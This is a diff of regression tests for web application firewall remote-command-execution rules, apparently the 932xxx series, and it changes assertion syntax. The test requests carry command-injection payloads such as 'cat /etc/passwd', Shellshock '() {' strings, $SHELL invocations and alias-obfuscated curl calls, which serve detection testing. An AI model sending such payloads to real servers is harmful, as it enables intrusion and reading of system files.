"/get?foo=IF+%2FI+NOT+EXIST+C%3A%5Cnonexistent+++echo+hey" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 75 desc: imported test stages: @@ -1128,7 +1202,8 @@ tests: uri: "/get?foo=IF+++%2FI+++NOT+++EXIST+++C%3A%5Cnonexistent+++echo+hey" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 76 desc: imported test stages: @@ -1143,7 +1218,8 @@ tests: uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++%28CMD%29+ELSE+%28CMD%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 77 desc: imported test stages: @@ -1158,7 +1234,8 @@ tests: uri: "/get?foo=IF++++NOT+EXIST+%28C%3A%5Cnonexistent%29+ECHO+pwnt" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 78 desc: imported test stages: @@ -1173,7 +1250,8 @@ tests: uri: "/get?foo=IF++++++++DEFINED+variable+++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 79 desc: imported test stages: @@ -1188,7 +1266,8 @@ tests: uri: "/get?foo=IF++++NOT+DEFINED+_example+++++++ECHO+Value+Missing" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 80 desc: imported test stages: @@ -1203,7 +1282,8 @@ tests: uri: "/get?foo=IF++++++++ERRORLEVEL+0+++++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 81 desc: imported test stages: @@ -1218,7 +1298,8 @@ tests: uri: "/get?foo=IF++++NOT+ERRORLEVEL+0+++++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 82 desc: imported test stages: @@ -1233,7 +1314,8 @@ tests: uri: "/get?foo=IF++++++++CMDEXTVERSION+1++++++++GOTO+start_process" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 83 desc: imported test stages: @@ -1248,7 +1330,8 @@ tests: uri: "/get?foo=IF++++++++2++++++++++++GEQ+15++++echo+%22bigger%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 84 desc: imported test stages: @@ -1263,7 +1346,8 @@ tests: uri: "/get?foo=IF++++++++%222%22++++++++++GEQ+%2215%22++echo+%22bigger%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 85 desc: imported test stages: @@ -1278,7 +1362,8 @@ tests: uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+EQU+2+++++goto+sub_problem2" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 86 desc: imported test stages: @@ -1293,7 +1378,8 @@ tests: uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+NEQ+0+++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 87 desc: imported test stages: @@ -1308,7 +1394,8 @@ tests: uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+LEQ+2+++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 88 desc: imported test stages: @@ -1323,7 +1410,8 @@ tests: uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 89 desc: imported test stages: @@ -1338,7 +1426,8 @@ tests: uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GEQ+2+++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 90 desc: imported test stages: @@ -1353,7 +1442,8 @@ tests: uri: "/get?foo=IF++++++++%25VARIABLE%25+++GTR+0+++++Echo+An+error+was+found" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 91 desc: imported test stages: @@ -1368,7 +1458,8 @@ tests: uri: "/get?foo=IF++++++++%25VARIABLE%25+++LSS+0+++++Echo+An+error+was+found" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 92 desc: imported test stages: @@ -1383,7 +1474,8 @@ tests: uri: "/get?foo=IF++++++++%25VARIABLE%25+++EQU+0+++++Echo+An+error+was+found" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 93 desc: imported test stages: @@ -1398,7 +1490,8 @@ tests: uri: "/get?foo=IF+%2FI+++++item1%3D%3Ditem2+++++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 94 desc: imported test stages: @@ -1413,7 +1506,8 @@ tests: uri: "/get?foo=IF+%2FI+NOT+item1%3D%3Ditem2+++++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 95 desc: imported test stages: @@ -1428,7 +1522,8 @@ tests: uri: "/get?foo=IF+%2FI+NOT+1%3D%3D2+++++++++++++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 96 desc: imported test stages: @@ -1443,7 +1538,8 @@ tests: uri: "/get?foo=IF++++++++%25_prefix%25%3D%3DSS6+++++++++GOTO+they_matched" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 97 desc: imported test stages: @@ -1458,7 +1554,8 @@ tests: uri: "/get?foo=IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 98 desc: imported test stages: @@ -1473,7 +1570,8 @@ tests: uri: "/get?foo=IF++++++++%5B%251%5D+EQU+%5B%5D++++++++++++ECHO+Value+Missing" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 99 desc: imported test stages: @@ -1488,7 +1586,8 @@ tests: uri: "/get?foo=IF++++++++%282+GEQ+15%29+++++++++++++echo+%22bigger%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 100 desc: imported test stages: @@ -1503,7 +1602,8 @@ tests: uri: "/get?foo=IF++++++++red%3D%3Dred+++++++++++++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 101 desc: imported test stages: @@ -1518,7 +1618,8 @@ tests: uri: "/get?foo=IF++++NOT+red%3D%3D%3Dred++++++++++++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 102 desc: imported test stages: @@ -1533,7 +1634,8 @@ tests: uri: "/get?foo=IF+%2FI+++++Red%3D%3Dred+++++++++++++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 103 desc: imported test stages: @@ -1548,7 +1650,8 @@ tests: uri: "/get?foo=if+%281%29+equ+%281%29+echo+hey" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 104 desc: imported test stages: @@ -1563,7 +1666,8 @@ tests: uri: "/get?foo=if+not+%282+equ+2%29+echo+hey" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 105 desc: imported test stages: @@ -1578,7 +1682,8 @@ tests: uri: "/get?foo=if+%22%25VAR%25%22%3D%3D%25%25A+do+echo+true" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 106 desc: imported test stages: @@ -1593,7 +1698,8 @@ tests: uri: "/get?foo=IF+%22%25%7E1%22+%3D%3D+%22%25%7E2%22+%28EXIT+%2FB+0%29+ELSE+%28EXIT+%2FB+1%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 107 desc: imported test stages: @@ -1608,7 +1714,8 @@ tests: uri: "/get?foo=if+%25n1%25+gtr+%25n2%25+echo+%25n1%25+is+greater+than+%25n2%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 108 desc: imported test stages: @@ -1623,7 +1730,8 @@ tests: uri: "/get?foo=if+%25n1%25+lss+%25n2%25+echo+%25n1%25+is+less+than+%25n2%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 109 desc: imported test stages: @@ -1638,7 +1746,8 @@ tests: uri: "/get?foo=if+%25n1%25+equ+%25n2%25+echo+%25n1%25+is+equal+to+%25n2%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 110 desc: imported test stages: @@ -1653,7 +1762,8 @@ tests: uri: "/get?foo=if+%22%25n1%25%22+gtr+%22%25n2%25%22+echo+%22%25n1%25%22+is+greater+than+%22%25n2%25%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 111 desc: imported test stages: @@ -1668,7 +1778,8 @@ tests: uri: "/get?foo=if+%22%25n1%25%22+lss+%22%25n2%25%22+echo+%22%25n1%25%22+is+less+than+%22%25n2%25%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 112 desc: imported test stages: @@ -1683,7 +1794,8 @@ tests: uri: "/get?foo=if+%22%25n1%25%22+equ+%22%25n2%25%22+echo+%22%25n1%25%22+is+equal+to+%22%25n2%25%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 113 desc: imported test stages: @@ -1698,7 +1810,8 @@ tests: uri: "/get?foo=if+not+defined+n1+set+%22n1%3D0%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 114 desc: imported test stages: @@ -1713,7 +1826,8 @@ tests: uri: "/get?foo=IF+X%251%3D%3DX%2F%3F+GOTO+Helpscreen" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 115 desc: imported test stages: @@ -1728,7 +1842,8 @@ tests: uri: "/get?foo=IF+%22%251%22%3D%3D%22%2F%3F%22+..." version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 116 desc: imported test stages: @@ -1743,7 +1858,8 @@ tests: uri: "/get?foo=IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..." version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 117 desc: imported test stages: @@ -1758,7 +1874,8 @@ tests: uri: "/get?foo=IF+%22%25%7E1%22%3D%3D%22%2F%3F%22+..." version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 118 desc: imported test stages: @@ -1773,7 +1890,8 @@ tests: uri: "/get?foo=IF+ERRORLEVEL+3+IF+NOT+ERRORLEVEL+4+..." version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 119 desc: imported test stages: @@ -1788,7 +1906,8 @@ tests: uri: "/get?foo=IF+NOT+DEFINED+BAR+%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 120 desc: imported test stages: @@ -1803,7 +1922,8 @@ tests: uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22before%22+%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 121 desc: imported test stages: @@ -1818,7 +1938,8 @@ tests: uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22after%22+%40echo+ok" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 122 desc: imported test stages: @@ -1833,7 +1954,8 @@ tests: uri: "/get?foo=if+%22%21VAR%21%22+%3D%3D+%22after%22+%40echo+ok" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 123 desc: imported test stages: @@ -1848,7 +1970,8 @@ tests: uri: "/get?foo=if+not+defined+BAR+set+FOO%3D1%26+echo+FOO%3A+%25FOO%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 124 desc: imported test stages: @@ -1863,7 +1986,8 @@ tests: uri: "/get?foo=if+%28%251%29%3D%3D%28LTRS%29+CD+C%3A%5CWORD%5CLTRS" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 125 desc: imported test stages: @@ -1878,7 +2002,8 @@ tests: uri: "/get?foo=if+%22%251%22%3D%3D%22%22+goto+ERROR" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 126 desc: imported test stages: @@ -1893,7 +2018,8 @@ tests: uri: "/get?foo=if+%28AA%29+%3D%3D+%28AA%29+echo+same" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 127 desc: imported test stages: @@ -1908,7 +2034,8 @@ tests: uri: "/get?foo=if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 128 desc: imported test stages: @@ -1923,7 +2050,8 @@ tests: uri: "/get?foo=if+%22A+A%22+%3D%3D+%22A+A%22+echo+same" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 129 desc: imported test stages: @@ -1938,7 +2066,8 @@ tests: uri: "/get?foo=IF+%25_prog%3A%7E-1%25+NEQ+%5C+%28Set+_prog%3D%25_prog%25%5C%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 130 desc: imported test stages: @@ -1953,7 +2082,8 @@ tests: uri: "/get?foo=IF+EXIST+%22temp.txt%22+ECHO+found" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 131 desc: imported test stages: @@ -1968,7 +2098,8 @@ tests: uri: "/get?foo=IF+NOT+EXIST+%22temp.txt%22+ECHO+not+found" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 132 desc: imported test stages: @@ -1983,7 +2114,8 @@ tests: uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 133 desc: imported test stages: @@ -1998,7 +2130,8 @@ tests: uri: "/get?foo=IF+NOT+DEFINED+var+%28SET+var%3Ddefault+value%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 134 desc: imported test stages: @@ -2013,7 +2146,8 @@ tests: uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22Hello%2C+World%21%22+%28ECHO+found%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 135 desc: imported test stages: @@ -2028,7 +2162,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25var%25%22%3D%3D%22hello%2C+world%21%22+%28+ECHO+found+%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 136 desc: imported test stages: @@ -2043,7 +2178,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25var%25%22+EQU+%221%22+ECHO+equality+with+1" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 137 desc: imported test stages: @@ -2058,7 +2194,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25var%25%22+NEQ+%220%22+ECHO+inequality+with+0" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 138 desc: imported test stages: @@ -2073,7 +2210,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25var%25%22+GEQ+%221%22+ECHO+greater+than+or+equal+to+1" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 139 desc: imported test stages: @@ -2088,7 +2226,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25var%25%22+LEQ+%221%22+ECHO+less+than+or+equal+to+1" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 140 desc: imported test stages: @@ -2103,7 +2242,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25ERRORLEVEL%25%22+NEQ+%220%22+%28ECHO+execution+failed%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 141 desc: imported test stages: @@ -2118,7 +2258,8 @@ tests: uri: "/get?foo=if+not+%251+%3D%3D+%22%22+%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 142 desc: imported test stages: @@ -2133,7 +2274,8 @@ tests: uri: "/get?foo=if+not+%22%251%22+%3D%3D+%22%22+%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 143 desc: imported test stages: @@ -2148,7 +2290,8 @@ tests: uri: "/get?foo=if+not+%7B%251%7D+%3D%3D+%7B%7D" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 144 desc: imported test stages: @@ -2163,7 +2306,8 @@ tests: uri: "/get?foo=if+not+%22A%251%22+%3D%3D+%22A%22+%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 145 desc: imported test stages: @@ -2178,7 +2322,8 @@ tests: uri: "/get?foo=IF+DEFINED+ARG+%28echo+%22It+is+defined%3A+%251%22%29+ELSE+%28echo+%22%25%251+is+not+defined%22%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 146 desc: imported test stages: @@ -2193,7 +2338,8 @@ tests: uri: "/get?foo=if3q+hfy6e8egfxsjtewc838gsfbhwvw9qzfty3gjs86syg7y6mrpwgw4ekureakjpk6%2Flyghe9pnfekpw2yt8svzseinhs1rbkuu%2Fzq15u5wh8nj8dd+fn86qcdwzv3s9hw35e14pxgcv34dhmt1mwbxnicwudjawfqz+fphmr5vlnufdihoffpuvqwkcmom61i3lisyxg65fx+rgbnrs6e4pmbvy2xl+vwb8oct23cyypregi638dkychllvvw5kq7rolfbhk3hojxz9tthunqky9dodqbb6u8roh+firwx8kuf1dfgewcto9eljhuaoqgdk4qwxlziktaf1mw2atcmw7jvzsh1s0kngiepps54lj4wtcbfzfvbqb7y3caffhnvfrm3tbjxlywqakfqxoprh7yooguat5flg2ozx5%2Fafn7w%3D%3D" version: HTTP/1.0 output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] - test_id: 147 desc: imported test stages: @@ -2208,7 +2354,8 @@ tests: uri: "/get?foo=if+a%3D%3Db+foo" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 148 desc: imported test stages: @@ -2223,7 +2370,8 @@ tests: uri: "/get?foo=if%2Fi+a%3D%3Db+foo" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 149 desc: imported test stages: @@ -2238,7 +2386,8 @@ tests: uri: "/get?foo=if+%2Fi+a%3D%3Db+foo" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 150 desc: imported test stages: @@ -2253,7 +2402,8 @@ tests: uri: "/get?foo=if+%2Fi+%22a%22%3D%3D%22b%22++foo" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 151 desc: imported test stages: @@ -2268,7 +2418,8 @@ tests: uri: "/get?foo=if+%2Fi+not++%22a%22%3D%3D%22b%22++foo" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 152 desc: imported test stages: @@ -2283,7 +2434,8 @@ tests: uri: "/get?foo=if+++exist+StorageServer.port+echo+yay" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 153 desc: imported test stages: @@ -2298,7 +2450,8 @@ tests: uri: "/get?foo=if+%2Fi+exist+StorageServer.port+echo+yay" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 154 desc: imported test stages: @@ -2313,7 +2466,8 @@ tests: uri: "/get?foo=ifq+a%3D%3Db+foo" version: HTTP/1.0 output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] - test_id: 155 desc: imported test stages: @@ -2328,7 +2482,8 @@ tests: uri: "/get?foo=iffoo+a%3D%3Db+foo" version: HTTP/1.0 output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] - test_id: 156 desc: imported test stages: @@ -2343,7 +2498,8 @@ tests: uri: "/get?foo=if3+a%3D%3Db+foo" version: HTTP/1.0 output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] - test_id: 157 desc: imported test stages: @@ -2358,7 +2514,8 @@ tests: uri: "/get?foo=if3q+a%3D%3Db+foo" version: HTTP/1.0 output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] - test_id: 158 desc: | FP when using `t:urlDecodeUni`. @@ -2379,4 +2536,5 @@ tests: version: HTTP/1.0 data: <?xml version="1.0" encoding="UTF-8"?><note><pdf>if+foo==</pdf></note> output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml index 993e9b989..fa787f6fa 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?932160-1=cat%20/etc/passwd" version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 2 stages: - input: @@ -32,7 +33,8 @@ tests: data: "932160-2=/usr/bin/perl -e 'print readline' some-file.txt" version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 3 stages: - input: @@ -47,7 +49,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 4 stages: - input: @@ -62,7 +65,8 @@ tests: data: '932160-2=dont match commands that are not fully qualified like bash python and perl.' version: "HTTP/1.1" output: - no_log_contains: "id \"932160\"" + log: + no_expect_ids: [932160] - test_id: 5 desc: "Positive test: Match against bin/gunzip" stages: @@ -78,7 +82,8 @@ tests: data: 'cmd=/bin/gunzip -c /var/log/something_sensitive.gz' version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 6 desc: "Positive test: Match against bin/unxz" stages: @@ -94,7 +99,8 @@ tests: data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 7 desc: "Negative test: Don't match against the word zip" stages: @@ -110,7 +116,8 @@ tests: data: 'sentence=The zip on my coat is stuck' version: "HTTP/1.1" output: - no_log_contains: "id \"932160\"" + log: + no_expect_ids: [932160] - test_id: 8 desc: "Positive test: Triggering only this rule and no other one" stages: @@ -126,7 +133,8 @@ tests: data: 'cmd=/bin/ab' version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 9 desc: "Positive test: Unix Command Injection - $SHELL test" stages: @@ -142,7 +150,8 @@ tests: uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] - test_id: 10 desc: "Positive test: Unix Command Injection - ${SHELL} test" stages: @@ -158,7 +167,8 @@ tests: uri: "/get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] - test_id: 11 desc: "Positive test: Match against bin/ansible" stages: @@ -173,7 +183,8 @@ tests: uri: "/get?a=bin/ansible" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] - test_id: 12 desc: "Positive test: Match against bin/chef" stages: @@ -188,7 +199,8 @@ tests: uri: "/get?a=bin/chef" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] - test_id: 13 desc: "Positive test: Match against bin/cscli" stages: @@ -203,7 +215,8 @@ tests: uri: "/get?a=bin/cscli" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] - test_id: 14 desc: "Positive test: Match against bin/visudo" stages: @@ -218,4 +231,5 @@ tests: uri: "/get?a=bin/visudo" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml index 0667f10fb..1eff8d79d 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml @@ -15,7 +15,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 2 stages: - input: @@ -29,7 +30,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 3 stages: - input: @@ -43,7 +45,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 4 stages: - input: @@ -57,7 +60,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 5 stages: - input: @@ -71,7 +75,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 6 stages: - input: @@ -85,7 +90,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 7 stages: - input: @@ -100,7 +106,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 8 stages: - input: @@ -115,7 +122,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 9 stages: - input: @@ -130,7 +138,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 10 stages: - input: @@ -145,7 +154,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 11 stages: - input: @@ -160,7 +170,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 12 stages: - input: @@ -175,4 +186,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml index 6e8179bd9..837b9b15c 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml @@ -20,4 +20,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932170" + log: + expect_ids: [932170] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml index 9fefdbbb8..4f1721ed8 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml @@ -19,7 +19,8 @@ tests: uri: "/get?%28%29%20%7B" version: HTTP/1.0 output: - log_contains: id "932171" + log: + expect_ids: [932171] - test_id: 2 desc: "Test for '() {' in ARGS" stages: @@ -35,4 +36,5 @@ tests: uri: "/get?arg=%28%29%20%7B" version: HTTP/1.0 output: - log_contains: id "932171" + log: + expect_ids: [932171] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml index b8e7354c2..44ab3f124 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?rce=alias%20eennvv%3Denv%26eennvv%20whoami" version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 2 desc: "Test for alias with shell tricks" stages: @@ -35,7 +36,8 @@ tests: rce=alias a=c${KK}url&a google.com version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 3 desc: "Test for alias name with single quoting" stages: @@ -52,7 +54,8 @@ tests: rce=alias 'letter'=curl&letter google.com version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 4 desc: "Test for alias name with double quotes" stages: @@ -69,7 +72,8 @@ tests: rce=alias "quote"=curl"e google.com version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 5 desc: "Test for alias value with single quoting" stages: @@ -86,7 +90,8 @@ tests: rce=alias alias='curl'&letter google.com version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 6 desc: "Test for alias value with double quotes" stages: @@ -103,7 +108,8 @@ tests: rce=alias double="curl""e google.com version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 7 desc: "Negative test alias" stages: @@ -120,7 +126,8 @@ tests: "text=I%20see%2C%20so%20your%20alias%20is%20not%20%3D%20to%20your%20name" version: 